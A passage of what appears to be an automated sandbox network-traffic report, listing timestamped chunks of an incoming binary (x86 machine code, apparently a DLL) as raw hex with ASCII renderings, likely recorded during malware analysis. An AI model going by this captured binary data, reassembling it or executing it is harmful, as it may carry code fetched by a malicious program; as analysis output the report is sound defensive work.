10 8b 04 b0 50 51 ff 75 08 50 51 ff 75 fc 52 57 68 34 04 13 10 e8 ae 0b 0c 00 8b f8 83 c4 24 ba 10 d8 12 10 85 ff 74 0b 8b 4d 0c 8b 45 14 46 3b f3 7c Data Ascii: uPRh]USVWU333E}~XME<u7EEPQuPQuRWhX1$tMEF;\|Et_^[]h_^[]UQSVWU33}~BME<t0EPQuPQuRWh4$tMEF;\|
2023-11-18 09:02:39 UTC	1453	IN	Data Raw: be 58 03 13 10 8b 45 08 ff 70 08 e8 f5 10 0c 00 56 68 10 8c 12 10 e8 5a e6 0b 00 8b 4d 08 83 c4 0c 5f 5e 89 41 08 b8 01 00 00 00 5b 8b e5 5d c3 cc cc cc cc cc 55 8b ec 8b 45 08 8b 4d 0c 8b 40 04 99 89 01 33 c0 89 51 04 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b 45 10 83 ec 08 56 57 83 e8 00 0f 84 bf 00 00 00 6a 00 83 e8 01 74 66 8b 7d 0c 8b 45 08 6a 01 6a ff 8b 37 8b 48 14 03 c9 6a ff 8b 56 20 8b 42 10 8b 14 c8 8b ce e8 7f cc 09 00 83 c4 10 85 c0 0f 84 c1 00 00 00 83 f8 12 75 22 8b 0f ba a4 94 12 10 6a 00 6a 01 6a ff 6a ff 89 47 14 e8 58 cc 09 00 83 c4 10 33 c0 5f 5e 8b e5 5d c3 57 e8 a7 51 09 00 83 c4 04 33 c0 5f 5e 8b e5 5d c3 8b 75 08 8d 4c 24 10 51 c7 44 24 14 00 00 00 00 8b 46 0c ff 76 04 50 8b 80 dc 00 00 00 ff d0 83 c4 10 85 c0 75 17 Data Ascii: XEpVhZM_^A[]UEM@3Q]UEVWjtf}Ejj7HjV Bu"jjjjGX3_^]WQ3_^]uL$QD$FvPu
2023-11-18 09:02:39 UTC	1456	IN	Data Raw: 85 02 00 00 00 03 f8 80 7e 09 00 8d 3c fe 89 7c 24 18 75 5a c7 86 28 05 00 00 00 00 00 00 c7 86 2c 05 00 00 00 00 00 00 c7 86 30 05 00 00 00 00 00 00 c7 86 34 05 00 00 00 00 00 00 c7 86 38 05 00 00 00 00 00 00 c7 86 3c 05 00 00 00 00 00 00 c7 86 48 05 00 00 00 00 00 00 c7 86 4c 05 00 00 00 00 00 00 c7 86 24 05 00 00 00 00 00 00 8b 47 08 3b 47 14 0f 8d d8 00 00 00 8b 47 08 8d 0c 40 8b 47 1c 8d 3c c8 8b 47 14 3b 47 08 0f 8d a7 00 00 00 0f 1f 00 80 7b 09 00 74 10 ff 43 0c 80 7b 0a 00 75 07 8b cb e8 5a a4 0a 00 80 7b 09 00 8b 43 04 8b 40 28 89 44 24 1c 74 0d 83 43 0c ff 75 07 8b cb e8 fd a4 0a 00 ff 86 24 05 00 00 8b ce e8 f0 05 00 00 8b 47 08 48 39 47 14 7d 16 8b 44 24 1c 83 c0 fc 99 01 86 38 05 00 00 11 96 3c 05 00 00 eb 27 8b 47 10 99 01 86 38 05 00 00 8b Data Ascii: ~<\|$uZ(,048<HL$G;GG@G<G;G{tC{uZ{C@(D$tCu$GH9G}D$8<'G8
2023-11-18 09:02:39 UTC	1459	IN	Data Raw: cc cc cc cc cc 55 8b ec b8 81 80 80 80 53 56 57 8b f9 8d 77 f4 80 fa 0d 75 19 c1 e6 05 f7 ee 03 d6 8d 77 dd c1 fa 07 8b da c1 eb 1f 83 c3 e9 03 da eb 2f 8b ce c1 e6 06 c1 e1 05 f7 e9 b8 81 80 80 80 03 d1 c1 fa 07 8b da 83 c2 e9 c1 eb 1f 03 da f7 ee 03 d6 c1 fa 07 8b f2 c1 ee 1f 83 c6 e9 03 f2 8b 45 08 8d 4f fc 2b c3 99 f7 f9 5f 03 d3 3b d6 5e 0f 4f d3 8b c2 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 8b ce e8 82 00 00 00 ff 76 04 e8 fa 48 09 00 56 e8 c4 f9 0b 00 83 c4 08 33 c0 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc c7 81 28 05 00 00 00 00 00 00 c7 81 2c 05 00 00 00 00 00 00 c7 81 30 05 00 00 00 00 00 00 c7 81 34 05 00 00 00 00 00 00 c7 81 38 05 00 00 00 00 00 00 c7 81 3c 05 00 00 00 00 00 00 c7 81 48 05 00 00 00 00 00 00 c7 81 4c 05 Data Ascii: USVWwuw/EO+_;^O[]UVuvHV3^](,048<HL
2023-11-18 09:02:39 UTC	1463	IN	Data Raw: 0b c1 74 0e 51 57 e8 f2 ea 0b 00 83 c4 08 8b f8 eb 02 33 ff 85 ff 75 09 c7 46 28 07 00 00 00 eb 14 53 ff 74 24 14 57 e8 b1 24 fc ff 8b 44 24 20 83 c4 0c 89 18 8b 5d 0c ff 76 14 e8 8d 37 09 00 83 c4 04 83 7e 28 00 75 1d 89 46 28 85 c0 75 16 85 ff 75 12 53 ff 75 08 68 bc fe 12 10 56 e8 1a 00 00 00 83 c4 10 8b c7 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 83 7e 28 00 75 4c 83 7e 30 64 7d 46 8d 45 10 50 ff 75 0c e8 71 be 0b 00 83 c4 08 85 c0 74 29 8b 4e 2c ba bc 7d 12 10 50 85 c9 b8 34 8f 12 10 0f 44 c2 50 51 68 84 fe 12 10 e8 1b be 0b 00 83 c4 10 89 46 2c 85 c0 75 07 c7 46 28 07 00 00 00 ff 46 30 5e 5d c3 cc cc cc cc 55 8b ec 51 53 56 57 8d 45 10 33 db 50 ff 75 0c 89 5d fc e8 18 be 0b 00 8b 75 08 83 c4 08 8b f8 39 5e Data Ascii: tQW3uF(St$W$D$ ]v7~(uF(uuSuhV_^[]UVu~(uL~0d}FEPuqt)N,}P4DPQhF,uF(F0^]UQSVWE3Pu]u9^
2023-11-18 09:02:39 UTC	1469	IN	Data Raw: 8b 42 0c 85 c0 74 0d 50 ff 15 20 23 14 10 8b 4d fc 83 c4 04 51 ff 76 24 68 74 f8 12 10 e8 1b a8 0b 00 83 c4 0c eb 33 6a 00 6a 00 8b d0 8b cf e8 79 03 09 00 8b 55 f8 8b cf 6a 00 6a 00 42 8b f0 e8 68 03 09 00 50 56 8b 75 f0 ff 76 24 68 94 f8 12 10 e8 e6 a7 0b 00 83 c4 20 89 46 08 57 e8 9a 21 09 00 83 c4 04 b8 13 00 00 00 85 db 0f 44 d8 5f 5e 8b c3 5b 8b e5 5d c3 cc cc cc cc 51 0f b7 41 08 a8 08 74 09 f2 0f 10 09 0f 57 d2 eb 2d a8 24 74 12 8b 51 04 8b 09 e8 c0 0a 0c 00 0f 28 c8 0f 57 d2 eb 17 a8 12 74 0d e8 6f 98 09 00 0f 28 c8 0f 57 d2 eb 06 0f 57 d2 0f 28 ca 0f 57 db f2 0f 5a d9 0f 5a c3 66 0f 2f c8 76 2a 66 0f 2f d1 76 12 f2 0f 10 05 e8 cc 13 10 f2 0f 59 c1 66 0f 5a c0 59 c3 f2 0f 10 05 f8 cc 13 10 f2 0f 59 c1 66 0f 5a c0 59 c3 0f 28 c3 59 c3 cc cc 51 0f Data Ascii: BtP #MQv$ht3jjyUjjBhPVuv$h FW!D_^[]QAtW-$tQ(Wto(WW(WZZf/v*f/vYfZYYfZY(YQ
2023-11-18 09:02:39 UTC	1491	IN	Data Raw: 08 03 c8 74 79 0f 1f 84 00 00 00 00 00 0f b6 43 17 0f af 44 24 14 ff 75 0c 8b 4c 10 04 8b 44 10 08 8b d7 0f c9 51 0f c8 50 8b cb e8 2d 02 00 00 83 c4 0c 89 44 24 10 85 c0 75 6e 8b 57 18 ff 44 24 14 0f b6 4a 02 0f b6 42 03 c1 e1 08 03 c8 39 4c 24 14 7c b8 eb 27 83 7c 24 2c 00 75 20 8b 44 24 28 8b d7 ff 75 0c 8b cb ff 70 04 ff 30 e8 ea 01 00 00 83 c4 0c 89 44 24 10 85 c0 75 2b 8b d6 8b cb e8 56 32 00 00 8b f0 85 f6 0f 85 9e 00 00 00 8b d7 8b cb e8 43 32 00 00 8b f0 e9 0a 01 00 00 c7 44 24 10 07 00 00 00 8b 74 24 18 85 f6 74 7a 83 46 10 ff 75 74 ff 4b 3c 83 7e 08 01 75 0d 83 7e 0c 00 75 07 c7 43 1c ff ff ff ff 8b 16 85 d2 74 0b 8b cb e8 03 32 00 00 85 c0 75 09 8b d6 8b cb e8 66 32 00 00 8b 46 08 0b 46 0c 74 33 8b 46 08 33 d2 b9 61 00 00 00 f7 f1 8d 4b 74 8b Data Ascii: tyCD$uLDQP-D$unWD$JB9L$\|'\|$,u D$(up0D$u+V2C2D$t$tzFutK<~u~uCt2uf2FFt3F3aKt
2023-11-18 09:02:39 UTC	1507	IN	Data Raw: 37 99 2b c2 d1 f8 0f b7 8c 45 80 fe ff ff 39 8d 78 fe ff ff 72 07 8b d8 8d 78 01 eb 03 8d 70 ff 3b f7 7d da 83 bd 74 fe ff ff 00 75 21 80 bc 1d 7c ff ff ff 00 7d 17 8b 85 7c fe ff ff 5f 5e 5b 8b 4d fc 33 cd e8 7f 73 fa ff 8b e5 5d c3 0f b7 8c 5d 80 fe ff ff 8b c1 83 e1 07 c1 e8 03 03 c1 8b 8d 7c fe ff ff 3b c8 7f 0b 0f b6 8c 1d 7c ff ff ff 83 e1 7f 8b c1 8b 4d fc 5f 5e 33 cd 5b e8 45 73 fa ff 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 57 8b f9 89 7d fc 81 ff 80 00 00 00 73 1e c1 ff 05 83 e1 1f b8 01 00 00 00 d3 e0 23 04 bd 18 56 13 10 f7 d8 5f 1b c0 40 8b e5 5d c3 81 ff 00 00 40 00 73 57 53 8b df b9 95 01 00 00 c1 e3 0a 33 ff 56 81 cb ff 03 00 00 33 f6 66 90 8d 04 0e 99 2b c2 d1 f8 3b 1c 85 40 44 13 10 72 07 8b f8 8d 70 01 eb 03 8d 48 ff 3b ce 7d e1 8b 0c bd Data Ascii: 7+E9xrxp;}tu!\|}\|_^[M3s]]\|;\|M_^3[Es]UQW}s#V_@]@sWS3V3f+;@DrpH;}
2023-11-18 09:02:39 UTC	1539	IN	Data Raw: 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 08 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 c7 46 0c 00 00 00 00 8b 76 08 85 f6 75 96 5f 5e c3 cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 56 8b f2 89 4c 24 0c 57 85 f6 75 04 33 db eb 31 0f b7 4e 08 8b c1 25 02 02 00 00 3d 02 02 00 00 75 0b 80 7e 0a 01 75 05 8b 5e 10 eb 14 f6 c1 01 74 04 33 db eb 0b b2 01 8b ce e8 a7 f5 08 00 8b d8 0f b7 46 08 a8 02 74 0b 80 7e 0a 01 75 05 8b 7e 0c eb 25 a8 10 74 0e 8b 7e 0c a9 00 40 00 00 74 17 03 3e eb 13 a8 01 74 04 33 ff eb 0b b2 01 8b ce e8 ef e5 08 00 8b f8 85 db 75 0a 8d 43 07 5f 5e 5b 8b e5 5d c3 83 ff 08 75 25 57 68 34 c5 12 10 53 e8 ae fe 0a 00 Data Ascii: tP#W")@BdBW"AtP #W"Fvu_^USVL$Wu31N%=u~u^t3Ft~u~%t~@t>t3uC_^[]u%Wh4S
2023-11-18 09:02:39 UTC	1545	IN	Data Raw: 24 44 85 ff 74 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 85 f6 0f 84 0f ff ff ff 8b 5c 24 48 53 e8 05 23 0b 00 83 c4 04 ff 74 24 54 e8 f9 22 0b 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 85 f6 75 da 8b 5c 24 14 8b c3 8b 7c 24 18 0b c7 74 63 8b 4c 24 10 8d 44 24 20 56 50 8d 56 11 89 74 24 28 e8 d5 71 00 00 8b f0 83 c4 08 85 f6 75 ad ff 74 24 2c 8b 74 24 24 ff 74 24 34 6a 01 56 e8 68 4e 08 00 8b cb 8b c7 83 e9 01 83 d8 00 50 51 6a 02 56 e8 54 4e 08 00 56 e8 1e 60 08 00 83 c4 24 56 e8 e5 70 08 00 8b f0 83 c4 04 85 f6 0f 85 69 ff ff ff 8b 4c Data Ascii: $DtX="tEAtP#W")@BdBW"AtP #W"\$HS#t$T"_^[]u\$\|$tcL$D$ VPVt$(qut$,t$$t$4jVhNPQjVTNV`$VpiL
2023-11-18 09:02:39 UTC	1556	IN	Data Raw: 99 52 50 6a 02 57 e8 ea 21 08 00 6a 01 56 e8 72 2b 08 00 99 52 50 6a 03 57 e8 d7 21 08 00 83 c4 40 57 e8 9e 33 08 00 83 c4 04 57 e8 65 44 08 00 83 c4 04 89 44 24 1c 56 85 c0 75 46 e8 84 33 08 00 83 c4 04 83 f8 64 74 a1 8b 7d 08 56 e8 43 44 08 00 83 c4 04 85 c0 75 22 ff 75 0c 8b 74 24 14 57 6a 01 56 e8 8c 21 08 00 56 e8 56 33 08 00 83 c4 14 56 e8 1d 44 08 00 83 c4 04 5f 5e 5b 8b e5 5d c3 e8 0e 44 08 00 8b 44 24 20 83 c4 04 5f 5e 5b 8b e5 5d c3 55 8b ec 83 ec 14 53 56 57 52 51 e8 50 29 08 00 8b d8 83 c4 08 85 db 0f 84 ee 00 00 00 0f 57 c0 ba 01 00 00 00 66 0f 13 45 f8 33 c9 80 3b 30 8b 7d fc 8b 75 f8 89 55 f0 72 46 8a 03 89 7d f4 89 75 fc 3c 39 77 35 0f a4 f7 02 0f b6 c0 c1 e6 02 83 e8 30 01 75 fc 8b 75 fc 11 7d f4 8b 7d f4 0f a4 f7 01 99 03 f6 03 c6 8b f0 Data Ascii: RPjW!jVr+RPjW!@W3WeDD$VuF3dt}VCDu"ut$WjV!VV3VD_^[]DD$ _^[]USVWRQP)WfE3;0}uUrF}u<9w50uu}}
2023-11-18 09:02:39 UTC	1566	IN	Data Raw: 98 43 8b 7c 24 18 89 44 24 0c e9 75 ff ff ff 8b 44 24 0c 8b 74 24 10 89 3c 98 43 8b 7c 24 18 e9 60 ff ff ff 8b 74 24 10 e9 53 ff ff ff 8b 44 24 0c 8b 74 24 10 e9 4a ff ff ff 8b 74 24 0c bb 07 00 00 00 e9 c7 00 00 00 85 f6 74 39 39 5e 10 74 34 80 3e 01 b9 60 93 06 10 8b 5d 0c b8 c0 93 06 10 8b 7d 08 0f 45 c1 53 57 ff d0 8b 76 0c 8b d7 8b 4c 24 24 4e 23 f0 56 53 e8 bf 44 00 00 83 c4 10 33 ff eb 02 33 c0 89 44 24 18 85 c0 0f 84 b3 00 00 00 8d 7c 24 18 bb 01 00 00 00 89 7c 24 0c 8d 34 9d 64 00 00 00 e8 c1 45 01 00 85 c0 74 0b 33 c0 89 44 24 14 8d 58 07 eb 50 8b c6 83 c8 00 74 0d 6a 00 56 e8 63 cf 0a 00 83 c4 08 eb 02 33 c0 89 44 24 14 85 c0 75 05 8d 58 07 eb 2d 56 6a 00 50 e8 26 db f9 ff 8b 44 24 20 8d 48 60 c7 00 ff ff ff 7f 89 48 38 8d 04 9d 00 00 00 00 50 Data Ascii: C\|$D$uD$t$<C\|$`t$SD$t$Jt$t99^t4>`]}ESWvL$$N#VSD33D$\|$\|$4dEt3D$XPtjVc3D$uX-VjP&D$ H`H8P
2023-11-18 09:02:39 UTC	1573	IN	Data Raw: 04 89 07 5f 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec ff 75 0c ff 75 08 e8 b2 00 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 51 53 56 57 8d 44 24 0c c7 44 24 0c 00 00 00 00 8b fa ba 16 00 00 00 6a 00 50 e8 0b 01 00 00 8b d8 83 c4 08 85 db 75 56 8b 74 24 0c 50 50 6a 01 56 e8 a4 dd 07 00 56 e8 6e ef 07 00 83 c4 14 83 f8 64 75 1a 53 56 e8 5f e3 07 00 83 c4 08 83 f8 04 75 0b 89 37 8b c3 5f 5e 5b 8b e5 5d c3 56 e8 16 00 08 00 83 c4 04 c7 07 00 00 00 00 85 c0 b9 0b 01 00 00 0f 44 c1 5f 5e 5b 8b e5 5d c3 8b 44 24 0c 89 07 8b c3 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 56 57 8d 45 fc c7 45 fc 00 00 00 00 8b fa ba 15 00 00 00 6a 00 50 e8 6f 00 00 00 8b c8 83 c4 08 85 c9 75 58 Data Ascii: _]Uuu]UQSVWD$D$jPuVt$PPjVVnduSV_u7_^[]VD_^[]D$_^[]UVWEEjPouX
2023-11-18 09:02:39 UTC	1593	IN	Data Raw: 40 84 c9 74 09 3a ca 75 f4 40 38 10 74 ef 85 c0 74 cb 2b c6 89 03 8b c6 5f 5e 5b c3 8a 07 8b cf 84 c0 74 0c 3c 5d 74 08 8a 41 01 41 84 c0 75 f4 80 39 00 8d 41 01 0f 44 c1 eb d3 84 d2 78 10 0f be ca 80 b9 f0 28 13 10 00 75 04 46 47 eb bf 8b c7 8a 08 84 c9 78 0c 0f be c9 80 b9 f0 28 13 10 00 74 ab 40 eb eb 5f 5e 33 c0 5b c3 90 29 79 06 10 b8 78 06 10 df 78 06 10 fe 78 06 10 00 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 01 03 03 03 03 01 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 03 01 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 84 c9 78 0f 0f be c1 80 b8 f0 28 13 10 00 75 03 33 c0 Data Ascii: @t:u@8tt+_^[t<]tAAu9ADx(uFGx(t@_^3[)yxxxx(u3
2023-11-18 09:02:39 UTC	1598	IN	Data Raw: 74 0b 8b cf e8 ec 02 00 00 85 c0 74 05 b8 01 00 00 00 85 c0 74 04 46 47 eb ab 80 3e 00 75 06 5f 33 c0 5e 5d c3 8a 06 84 c0 74 3d 0f be c0 0f be 80 ab 40 13 10 83 f8 02 7c 27 8a 46 01 84 c0 74 24 0f be c0 0f be 88 ab 40 13 10 83 f9 02 7d 09 b8 01 00 00 00 2b c1 eb 08 8d 4e 02 e8 c4 02 00 00 85 c0 74 03 46 eb bd 80 3e 00 74 b2 8a 06 84 c0 74 27 0f be c0 0f be 88 ab 40 13 10 83 f9 02 7d 09 b8 01 00 00 00 2b c1 eb 08 8d 4e 01 e8 92 02 00 00 85 c0 74 03 46 eb d3 80 3e 00 74 80 66 0f 1f 44 00 00 8a 06 84 c0 74 3d 0f be c0 0f be 80 ab 40 13 10 83 f8 02 7c 27 8a 46 01 84 c0 74 24 0f be c0 0f be 88 ab 40 13 10 83 f9 02 7d 09 b8 01 00 00 00 2b c1 eb 08 8d 4e 02 e8 44 02 00 00 85 c0 74 03 46 eb bd 33 c0 38 06 5f 0f 95 c0 5e 5d c3 cc cc 56 8b f1 57 8d 7e 02 8a 06 84 Data Ascii: tttFG>u_3^]t=@\|'Ft$@}+NtF>tt'@}+NtF>tfDt=@\|'Ft$@}+NDtF38_^]VW~
2023-11-18 09:02:39 UTC	1614	IN	Data Raw: 8b 7d f0 8b 47 14 89 45 08 85 c0 74 3b 83 38 00 74 36 83 3e 00 75 31 8b 5d fc 80 7f 20 00 75 25 ff 70 20 6a 00 ff 70 1c e8 a8 5d f9 ff 83 c4 0c 8b d7 8b cb 56 e8 1b fe ff ff 8b 45 08 83 c4 04 83 3e 00 74 d5 8b 5d ec c6 47 20 01 c6 43 20 01 5f 5e 5b 8b e5 5d c3 8b 43 10 8b 4b 0c 89 45 08 89 4d f0 8b 50 18 8b 40 1c 89 45 ec 39 41 1c 7c 10 7f 07 8b 41 18 3b c2 76 0c ba 01 00 00 00 eb 16 8b 41 18 3b c2 75 0c 8b 41 1c 3b 45 ec 75 04 33 d2 eb 03 83 ca ff 33 c0 39 45 f8 0f 94 c0 8d 04 45 ff ff ff ff 0f af c2 99 89 55 f4 8b 55 08 89 45 fc 80 7a 20 00 75 42 8a 41 20 8b 55 f4 84 c0 75 29 85 d2 7c 34 7f 06 83 7d fc 00 72 2c 84 c0 75 19 85 d2 7f 15 7c 06 83 7d fc 00 77 0d 8b d1 8b cf 56 e8 6c fd ff ff 83 c4 04 56 8b 75 08 8b cf 8b d6 e8 5c fd ff ff eb 0d 8b d1 8b cf Data Ascii: }GEt;8t6>u1] u%p jp]VE>t]G C _^[]CKEMP@E9A\|A;vA;uA;Eu339EEUUEz uBA Uu)\|4}r,u\|}wVlVu\
2023-11-18 09:02:40 UTC	2260	IN	Data Raw: 12 10 53 e8 4d 61 02 00 83 c4 14 85 c0 75 35 8b d7 8b cb e8 8d 87 ff ff 5f 5e 5b 8b e5 5d c3 be 07 00 00 00 8b cf e8 aa af ff ff 57 e8 b4 35 0a 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 be 07 00 00 00 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 e8 75 af ff ff 5d e9 7f 35 0a 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 8b 5d 08 56 57 33 ff 0f 1f 44 00 00 8b 87 f0 29 13 10 85 db 75 17 f7 d8 1b c0 85 c0 74 2d 83 c7 04 83 ff 14 72 e6 5f 5e 33 c0 5b 5d c3 85 c0 74 ed 8b f0 8b d3 2b f3 0f 1f 44 00 00 0f b6 02 0f b6 0c 16 3b c1 75 0e 85 c0 75 1c 5f 5e b8 01 00 00 00 5b 5d c3 0f b6 89 80 72 13 10 0f b6 80 80 72 13 10 2b c1 75 b3 42 eb d2 cc cc 55 8b ec 8b 4d 08 e8 95 7a ff ff 33 c0 5d c3 cc 33 c0 c3 cc cc cc cc cc cc cc Data Ascii: SMau5_^[]W5_^[]_^[]UMu]5US]VW3D)ut-r_^3[]t+D;uu_^[]rr+uBUMz3]3
2023-11-18 09:02:40 UTC	2266	IN	Data Raw: 75 24 39 45 1c 75 1f 8b 4c 24 2c ba 01 00 00 00 8b 44 24 28 8b 7c 24 18 89 44 24 30 89 4c 24 0c 89 4c 24 34 eb 12 8b 44 24 2c 8b 7c 24 18 89 44 24 0c 8b 44 24 28 33 d2 8d 4c 24 14 51 57 53 ff 74 24 2c 8b 5d 20 ff 74 24 34 ff 74 24 48 8b 4b 04 ff 74 24 48 41 ff 74 24 28 50 e8 35 52 ff ff 8b f8 83 c4 24 85 ff 75 7a 8b 4b 04 8b c1 25 0f 00 00 80 79 05 48 83 c8 f0 40 75 27 8b 1b 8d 3c 8d 40 00 00 00 e8 8b 96 00 00 85 c0 75 47 50 57 8b cb e8 3e 1c 0a 00 83 c4 08 85 c0 74 37 8b 5d 20 89 03 8b 53 04 8b 0b 8b 44 24 14 89 04 91 ff 43 04 e9 0c fd ff ff 83 7d 18 00 0f 85 75 ff ff ff 83 7d 1c 00 0f 85 6b ff ff ff ba 01 00 00 00 e9 63 ff ff ff 8b 4c 24 14 e8 e7 52 ff ff bf 07 00 00 00 56 e8 bc 6c 07 00 83 c4 04 83 ff 65 0f 44 f8 8b c7 5f 5e 5b 8b e5 5d c3 cc cc cc cc Data Ascii: u$9EuL$,D$(\|$D$0L$L$4D$,\|$D$D$(3L$QWSt$,] t$4t$HKt$HAt$(P5R$uzK%yH@u'<@uGPW>t7] SD$C}u}kcL$RVleD_^[]
2023-11-18 09:02:40 UTC	2274	IN	Data Raw: 45 08 89 44 24 68 8b 45 14 89 84 24 80 00 00 00 8b 45 18 53 8b 5d 10 89 44 24 28 33 c0 89 44 24 18 89 44 24 50 8b 03 89 8c 24 80 00 00 00 33 c9 56 89 54 24 78 33 d2 57 33 ff 89 54 24 18 80 78 03 34 89 54 24 4c 0f 94 c1 89 54 24 78 89 4c 24 54 33 c9 33 c0 89 4c 24 60 8b 4b 04 89 5c 24 3c c7 44 24 2c 00 00 00 00 89 7c 24 5c 89 7c 24 40 8d 51 01 89 84 24 80 00 00 00 89 44 24 64 89 44 24 44 89 44 24 1c 89 44 24 34 89 44 24 48 89 44 24 38 89 44 24 28 89 44 24 24 8a 01 41 84 c0 75 f9 2b ca 8d 41 01 8b 4b 08 89 44 24 50 8d 51 01 0f 1f 44 00 00 8a 01 41 84 c0 75 f9 8b 5d 0c 2b ca 8d 41 01 89 84 24 84 00 00 00 8d 34 9d f8 ff ff ff e8 4e 74 00 00 85 c0 0f 84 87 00 00 00 33 c9 89 4c 24 14 be 07 00 00 00 89 74 24 18 a1 e8 41 14 10 8b 5c 24 28 33 ff 39 7c 24 24 0f 8e Data Ascii: ED$hE$ES]D$(3D$D$P$3VT$x3W3T$x4T$LT$xL$T33L$`K\$<D$,\|$\\|$@Q$D$dD$DD$D$4D$HD$8D$(D$$Au+AKD$PQDAu]+A$4Nt3L$t$A\$(39\|$$
2023-11-18 09:02:40 UTC	2279	IN	Data Raw: 44 24 20 89 5c 24 18 66 0f 1f 44 00 00 85 ff 75 26 68 74 09 13 10 68 4c 4f 01 00 68 4c e3 12 10 68 1c e3 12 10 6a 15 e8 01 c0 09 00 8b 7c 24 20 83 c4 14 33 f6 eb 5e 0f b7 87 98 00 00 00 33 f6 8b 1f 3b c8 7d 4b 85 c9 78 47 8b 43 0c 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 8b 47 7c 03 44 24 18 50 e8 25 37 07 00 83 c4 04 8b f0 80 7b 53 00 74 09 8b cb e8 53 e3 09 00 33 f6 8b 43 0c 85 c0 74 0a 50 ff 15 20 23 14 10 83 c4 04 8b 7c 24 0c 8b 5c 24 18 8d 4e 01 0f 1f 44 00 00 8a 06 46 84 c0 75 f9 8b 54 24 14 2b f1 8b 4c 24 24 8d 46 01 03 d0 8b 44 24 20 89 54 24 14 83 d0 00 41 83 c3 28 89 44 24 20 89 4c 24 24 89 5c 24 18 3b 4c 24 10 0f 8c 35 ff ff ff 8b 4c 24 10 33 ff 8d 1c 8d 00 00 00 00 8b f3 03 f2 13 f8 e8 3d 63 00 00 85 c0 74 0a 33 ff 8d 77 07 e9 71 01 00 00 8b Data Ascii: D$ \$fDu&hthLOhLhj\|$ 3^3;}KxGCtP#G\|D$P%7{StS3CtP #\|$\$NDFuT$+L$$FD$ T$A(D$ L$$\$;L$5L$3=ct3wq
2023-11-18 09:02:40 UTC	2283	IN	Data Raw: 1c 08 be 01 00 00 00 88 1c 0a 8b 5d f4 03 c6 42 89 55 f8 80 3c 08 00 75 ce c6 04 0a 00 5e 5b 8b e5 5d c3 cc cc 55 8b ec 8b 4d 0c 33 c0 56 8b 75 08 0f 1f 40 00 0f ac ce 07 40 c1 e9 07 8b d6 0b d1 75 f2 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 01 56 8d 71 01 83 e0 7f 0f b6 0e c1 e1 07 0b c8 f7 c1 00 40 00 00 75 09 89 0a b8 02 00 00 00 5e c3 0f b6 46 01 81 e1 ff 3f 00 00 c1 e0 0e 0b c1 a9 00 00 20 00 75 09 89 02 b8 03 00 00 00 5e c3 0f b6 4e 02 25 ff ff 1f 00 c1 e1 15 0b c8 f7 c1 00 00 00 10 75 09 89 0a b8 04 00 00 00 5e c3 0f b6 46 03 81 e1 ff ff ff 0f 83 e0 07 c1 e0 1c 0b c1 89 02 b8 05 00 00 00 5e c3 cc cc cc cc 55 8b ec 83 ec 28 0f 57 c0 89 4d e8 66 0f 13 45 f4 8b c2 8b 55 f8 53 56 89 55 f0 33 f6 8b 55 f4 57 89 45 ec 8b f9 89 55 f8 0f Data Ascii: ]BU<u^[]UM3Vu@@u^]Vq@u^F? u^N%u^F^U(WMfEUSVU3UWEU
2023-11-18 09:02:40 UTC	2299	IN	Data Raw: b9 68 01 00 00 eb 70 3b b9 70 01 00 00 72 10 8b 81 60 01 00 00 89 07 89 b9 60 01 00 00 eb 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 8b ce e8 87 4c 03 00 8b 46 10 c6 46 5d d5 8b 78 1c 85 ff 0f 84 a7 00 00 00 83 be 20 02 00 00 00 74 0e 8b d7 8b ce e8 73 9a 09 00 e9 90 00 00 00 3b be 74 01 00 00 73 30 3b be 6c 01 00 00 72 10 8b 86 68 01 00 00 89 07 89 be 68 01 00 00 eb 70 3b be 70 01 00 00 72 10 8b 86 60 01 00 00 89 07 89 be 60 01 00 00 eb 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 Data Ascii: hp;pr``X="tEAtP#W")@BdBW"AtP #W"LFF]x ts;ts0;lrhhp;pr``X="tEAtP#W
